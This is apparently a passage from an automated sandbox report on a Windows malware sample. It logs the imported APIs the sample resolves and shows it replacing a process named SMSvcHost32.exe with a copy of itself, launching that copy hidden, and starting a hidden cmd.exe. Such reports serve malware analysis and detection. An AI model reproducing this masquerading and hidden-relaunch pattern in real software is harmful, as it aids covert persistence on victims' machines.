| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 3, address_out = 0x746cead0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x746c5240 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 23, address_out = 0x746ce6b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 15, address_out = 0x746c4a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 115, address_out = 0x746c6520 |
|
1 | |
| Module | Get Handle | module_name = WINHTTP.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WINHTTP.dll, base_address = 0x70210000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpQueryDataAvailable, address_out = 0x702347a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpReceiveResponse, address_out = 0x7021c8e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpOpen, address_out = 0x70246720 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpAddRequestHeaders, address_out = 0x70229400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpQueryHeaders, address_out = 0x702309c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpReadData, address_out = 0x70234ea0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpOpenRequest, address_out = 0x70248dd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpSetOption, address_out = 0x702306f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpCloseHandle, address_out = 0x70233ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpSendRequest, address_out = 0x7023bfd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpConnect, address_out = 0x70242880 |
|
1 | |
| Module | Get Handle | module_name = NETAPI32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = NETAPI32.dll, base_address = 0x77490000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\netapi32.dll, function = NetApiBufferFree, address_out = 0x6ff916d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\netapi32.dll, function = NetUserGetInfo, address_out = 0x6ff733a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x765e2790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x765e2730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x765b2510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x765baba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x765c66f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x765c7b50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x765bd290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x765bf5a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeThread, address_out = 0x765c4f40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x765e2850 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x765bafe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x765c6770 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x765b2ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x765baa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageA, address_out = 0x765bf830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x765b7830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x765c6a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileExW, address_out = 0x765bb2b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x765c6ec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x765b7970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x765b3690 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x765e22f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemInfo, address_out = 0x765ba0f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x765c0160 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x765ba8a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x765c6a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x765c4940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x765c4c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x765c6a70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x765c68c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x765c68e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x765c6c00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x765c6c40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x765c6c60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x765b7a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x765b1ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x765b38c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x765bcd50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x765c5100 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x765c6800 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteAtom, address_out = 0x765bcb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x765b8c80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x765c6820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x779c7a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x765b99f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAddAtomW, address_out = 0x765b1be0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x765b8bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ProcessIdToSessionId, address_out = 0x765b8fa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x765b7990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x765b3870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x765c4bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x765c6630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x765b9b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x765b78b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomW, address_out = 0x765b20f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x765b23e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x765b7710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x765bb000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x765b9bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x765b9f50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x765bfdb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x765b9fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringA, address_out = 0x765bfde0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x765bea30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x765c7b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetProcessPriorityBoost, address_out = 0x765bfef0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x765b9e90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x765b9b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadPriority, address_out = 0x765b9990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x765b9970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x765b75f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x765dd170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x765b9950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x765bccf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x765b79a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x765dd260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x765bcc30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x765c6bb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableW, address_out = 0x765be9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x765c6b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x765c6890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempFileNameW, address_out = 0x765c6b10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x765b7a30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x7798efe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x765b7600 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x765b7810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x765c6bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x765c6ca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x765c6640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x765e0990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x765c69b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x765baaf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x765c66b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x765c46a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x765b3880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x765c5eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameA, address_out = 0x765bfbf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameW, address_out = 0x765b2b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x765c6960 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x765c69a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x77810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x7783f890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x778404a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = ExitWindowsEx, address_out = 0x77879430 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetShellWindow, address_out = 0x7782ff50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x77848cb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x7782d9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowThreadProcessId, address_out = 0x7782da50 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74aa0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameA, address_out = 0x74ac2910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupAccountSidW, address_out = 0x74abf590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = DuplicateTokenEx, address_out = 0x74ac0ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x74abf570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateProcessAsUserW, address_out = 0x74ac2c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x74ac0440 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x74abf520 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExA, address_out = 0x74ac0a20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x74abf660 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetTokenInformation, address_out = 0x74ac3840 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyA, address_out = 0x74ac09d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74abf620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertSidToStringSidW, address_out = 0x74abf060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueA, address_out = 0x74ad4dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x74ac0980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74abf330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x74ac0fb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74abf350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeAcl, address_out = 0x74abfa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x74abfc00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AddAce, address_out = 0x74ac1ee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74abf7f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetKeySecurity, address_out = 0x74ad7830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74abfa20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x74ac2550 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x74ac2570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegGetKeySecurity, address_out = 0x74ac4190 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorDacl, address_out = 0x74abfc50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x74abf830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExA, address_out = 0x74abf790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x74abfb50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateWellKnownSid, address_out = 0x74ac0af0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x74ac0ab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x74ac0eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExA, address_out = 0x74abf500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x74ac3ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x74ac2bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetFileSecurityW, address_out = 0x74ac41d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyW, address_out = 0x74abfaa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74ac1030 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = StartServiceW, address_out = 0x74ac4210 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x74ac0ed0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x74ac0960 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateServiceW, address_out = 0x74ad65d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetServiceStatus, address_out = 0x74ac0fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegisterServiceCtrlHandlerW, address_out = 0x74ac12f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = StartServiceCtrlDispatcherW, address_out = 0x74ac12b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyA, address_out = 0x74ac2500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x74abf370 |
|
1 | |
| Module | Get Handle | module_name = Secur32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x6ff60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7469c5f0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\shell32.dll, base_address = 0x75120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x752be690 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = 680, address_out = 0x753cdb90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHChangeNotify, address_out = 0x7527cd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ole32.dll, base_address = 0x771d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoTaskMemFree, address_out = 0x748d9170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x74900060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x77201930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x748d92a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x748d88d0 |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\tmp8c77.tmp, base_address = 0x400000 |
|
1 |
Thread 0x928
7
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x765b8d20 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x752cbf80 |
|
1 | |
| Module | Get Filename | module_name = Secur32.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\tmp8c77.tmp, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\tmp8c77.tmp, base_address = 0x400000 |
|
1 |
Thread 0xb70
17
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = QueryFullProcessImageNameW, address_out = 0x765e1b70 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION, SYNCHRONIZE |
|
1 | |
| Process | Get filename | file_name = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Process | Open | desired_access = PROCESS_TERMINATE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Terminate | exit_code = 0 |
|
1 | |
| Process | Open | desired_access = PROCESS_TERMINATE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Terminate | exit_code = 0 |
|
1 | |
| System | Sleep | duration = 50 milliseconds (0.050 seconds) |
|
1 | |
| Process | Open | desired_access = PROCESS_TERMINATE, PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Sleep | duration = 50 milliseconds (0.050 seconds) |
|
1 | |
| File | Delete | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| File | Copy | source_filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp, destination_filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Process | Create | process_name = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, os_pid = 0x934, creation_flags = CREATE_DETACHED_PROCESS, CREATE_BREAKAWAY_FROM_JOB, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 | |
| Module | Get Filename | module_name = Secur32.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\tmp8c77.tmp, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp, size = 260 |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\cmd.exe, show_window = SW_HIDE |
|
1 |
Process #10: smsvchost32.exe
30264
149
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
| Command Line | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:01:27, Reason: Child Process |
| Unmonitor | End Time: 00:02:24, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x934 |
| Parent PID | 0xe6c (c:\users\nd9e1fyi\appdata\local\temp\tmp8c77.tmp) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
938
0x
56C
0x
614
0x
840
0x
EF0
0x
DD8
0x
EDC
0x
A54
0x
440
0x
904
0x
DB4
0x
DC0
0x
EC0
0x
F9C
0x
FB4
0x
AA8
0x
4D0
0x
8B8
0x
7CC
0x
624
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
